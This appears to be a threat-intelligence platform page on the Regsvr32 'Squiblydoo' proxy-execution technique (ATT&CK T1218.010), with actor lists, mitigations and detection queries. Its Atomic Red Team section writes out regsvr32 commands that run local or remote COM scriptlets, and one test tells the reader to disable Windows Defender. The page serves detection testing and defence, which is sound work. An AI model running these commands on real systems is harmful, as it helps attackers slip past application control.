Home/ATT&CK Technique/Regsvr32
ATT&CK Technique

Regsvr32

T1218.010 · stealth

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft.

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation.

This method makes no changes to the Registry as the COM object is not actually registered, only executed. This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking.

Windows

Actors Using This

14
chinaChimera (G0114)
russiaCloud Atlas
russia_speaking_organized_cybercrimeDarkGate Operators
chinaEarth Lusca
chinaAPT27
russia_speaking_organized_cybercrimeEmotet Operators
russia_speaking_organized_cybercrimeFIN8
russia_speaking_organized_cybercrimeIcedID / BokBot Operators (Lunar Spider)
north_koreaLazarus Group
russia_speaking_organized_cybercrimePikaBot Operators / Water Curupira
russia_speaking_organized_cybercrimeQakbot / Qbot Operators
chinaRedHotel
russia_speaking_organized_cybercrime_state_aligned_hybridRomCom
indiaSideWinder

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
resource-development same
T1588.003 · Code Signing Certificates ×6.35T1608.001 · Upload Malware ×4.29
execution same
T1559.001 · Component Object Model ×5.77
persistence same
T1547.009 · Shortcut Modification ×3.25
privilege-escalation same
T1548.002 · Bypass User Account Control ×7.14
credential-access same
T1003.004 · LSA Secrets ×6.80
discovery same
T1497.003 · Time Based Checks ×6.21T1069.001 · Local Groups ×4.33
command-and-control same
T1571 · Non-Standard Port ×7.27T1071.004 · DNS ×3.69
impact same
T1491.001 · Internal Defacement ×3.66
other same
T1027.009 · Embedded Payloads ×9.07T1221 · Template Injection ×6.80T1218.001 · Compiled HTML File ×6.35T1027.003 · Steganography ×3.97

Atomic Tests

5
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
command_promptwindowsRegsvr32 local COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. 
#{regsvr32path}\#{regsvr32name} /s /u /i:"#{filename}" scrobj.dll
command_promptwindowsRegsvr32 remote COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. 
#{regsvr32path}\#{regsvr32name} /s /u /i:#{url} scrobj.dll
command_promptwindowsRegsvr32 local DLL execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. 
IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
command_promptwindowsRegsvr32 Registering Non DLL
Replicating observed Gozi maldoc behavior registering a dll with an altered extension 
#{regsvr32path}\#{regsvr32name} /s #{dll_file}
command_promptwindowsRegsvr32 Silent DLL Install Call DllRegisterServer
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
#{regsvr32path}\#{regsvr32name} /s /i "#{dll_name}"

Mitigations

1
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1050Exploit Protection

Deploy capabilities that detect, block, and mitigate conditions indicative of software exploits. These capabilities aim to prevent exploitation by addressing vulnerabilities, monitoring anomalous behaviors, and applying exploit-mitigation techniques to harden systems and software.

Operating System Exploit Protections
  • Use Case: Enable built-in exploit protection features provided by modern operating systems, such as Microsoft's Exploit Protection, which includes techniques like Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG).
  • Implementation: Enforce DEP for all programs and enable ASLR to randomize memory addresses used by system and application processes. Windows: Configure Exploit Protection through the Windows Security app or deploy settings via Group Policy. ExploitProtectionExportSettings.exe -path "exploit_settings.xml" Linux: Use Kernel-level hardening features like SELinux, AppArmor, or GRSEC to enforce memory protections and prevent exploits.
Third-Party Endpoint Security
  • Use Case: Use endpoint protection tools with built-in exploit protection, such as enhanced memory protection, behavior monitoring, and real-time exploit detection.
  • Implementation: Deploy tools to detect and block exploitation attempts targeting unpatched software.
Virtual Patching
  • Use Case: Use tools to implement virtual patches that mitigate vulnerabilities in applications or operating systems until official patches are applied.
  • Implementation: Use Intrusion Prevention System (IPS) to block exploitation attempts on known vulnerabilities in outdated applications.
Hardening Application Configurations
  • Use Case: Disable risky application features that can be exploited, such as macros in Microsoft Office or JScript in Internet Explorer.
  • Implementation: Configure Microsoft Office Group Policies to disable execution of macros in downloaded files.

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 17
Analytics (MITRE CAR) 2
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

CAR Analytics

2
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2019-04-002Low coverageGeneric Regsvr32

Regsvr32 can be used to execute arbitrary code in the context of a Windows signed binary, which can be used to bypass application whitelisting. This analytic looks for suspicious usage of the tool. It's not likely that you'll get millions of hits, but it does occur during normal activity so some form of baselining would be necessary for this to be an alerting analytic.

Alternatively, it can be used for hunt by looking for new or anomalous DLLs manually.

splunk - Main Pattern
index=__your_sysmon_data__ EventCode=1 regsvr32.exe | search ParentImage="*regsvr32.exe" AND Image!="*regsvr32.exe*"
pseudocode - Main Pattern - pseudocode
processes = search Process:Create
regsvr_processes = filter processes where (
  parent_image_path == "*regsvr32.exe" and image_path != "*regsvr32.exe*"
 )
output regsvr_processes
splunk - New items since last month
index=__your_sysmon_data__ earliest=-d@d latest=now() EventCode=1 regsvr32.exe | search ParentImage="*regsvr32.exe" AND Image!="*regsvr32.exe*" | search NOT [
search index=__your_sysmon_data__ earliest=-60d@d latest=-30d@d EventCode=1 regsvr32.exe | search ParentImage="*regsvr32.exe" AND Image!="*regsvr32.exe*" | dedup CommandLine | fields CommandLine ]
splunk - Spawning child processes
index=__your_sysmon_data__ EventCode=1 (ParentImage="C:\\Windows\\System32\\regsvr32.exe" OR ParentImage="C:\\Windows\\SysWOW64\\regsvr32.exe") AND Image!="C:\\Windows\\System32\\regsvr32.exe" AND Image!="C:\\Windows\\SysWOW64\\regsvr32.exe" AND Image!="C:\\WINDOWS\\System32\\regsvr32.exe" AND Image!="C:\\WINDOWS\\SysWOW64\\regsvr32.exe" AND Image!="C:\\Windows\\SysWOW64\\WerFault.exe" AND Image!="C:\\Windows\\System32\\wevtutil.exe" AND Image!="C:\\Windows\\System32\\WerFault.exe"|stats values(ComputerName) as "Computer Name" values(ParentCommandLine) as "Parent Command Line" count(Image) as ImageCount by Image
pseudocode - Spawning child processes - pseudocode
processes = search Process:Create
regsvr_processes = filter processes where (
  (parent_image_path == "C:\Windows\System32\regsvr32.exe" or parent_image_path == "C:\Windows\SysWOW64\regsvr32.exe") and
  image_path != "C:\Windows\System32\regsvr32.exe" and
  image_path != "C:\Windows\SysWOW64\regsvr32.exe" and
  image_path != "C:\Windows\SysWOW64\WerFault.exe" and
  image_path != "C:\Windows\System32\WerFault.exe" and
  image_path != "C:\Windows\System32\wevtutil.exe"
 )
output regsvr_processes
splunk - Loading unsigned images
index=__your_sysmon_data__ EventCode=7 (Image="C:\\Windows\\System32\\regsvr32.exe" OR Image="C:\\Windows\\SysWOW64\\regsvr32.exe") Signed=false ImageLoaded!="C:\\Program Files*" ImageLoaded!="C:\\Windows\\*"|stats values(ComputerName) as "Computer Name" count(ImageLoaded) as ImageLoadedCount by ImageLoaded
CAR-2019-04-003Moderate coverageSquiblydoo

Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS. Squiblydoo was first written up by Casey Smith at Red Canary, though that blog post is no longer accessible.

splunk
index=__your_sysmon_events__ EventCode=1 regsvr32.exe scrobj.dll | search Image="*regsvr32.exe"
EQL
process where subtype.create and
  (process_path == "*regsvr32.exe" and command_line == "*scrobj.dll")
psuedocode
processes = search Process:Create
squiblydoo_processes = filter processes where (
  image_path == "*regsvr32.exe" and command_line == "*scrobj.dll"
  )
output squiblydoo_processes
LogPoint
norm_id=WindowsSysmon event_id=1 image="*\regsvr32.exe" command="*scrobj.dll"

Comply & Defend

NIST 800-53CA-07, SI-04, SI-07, SI-10
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin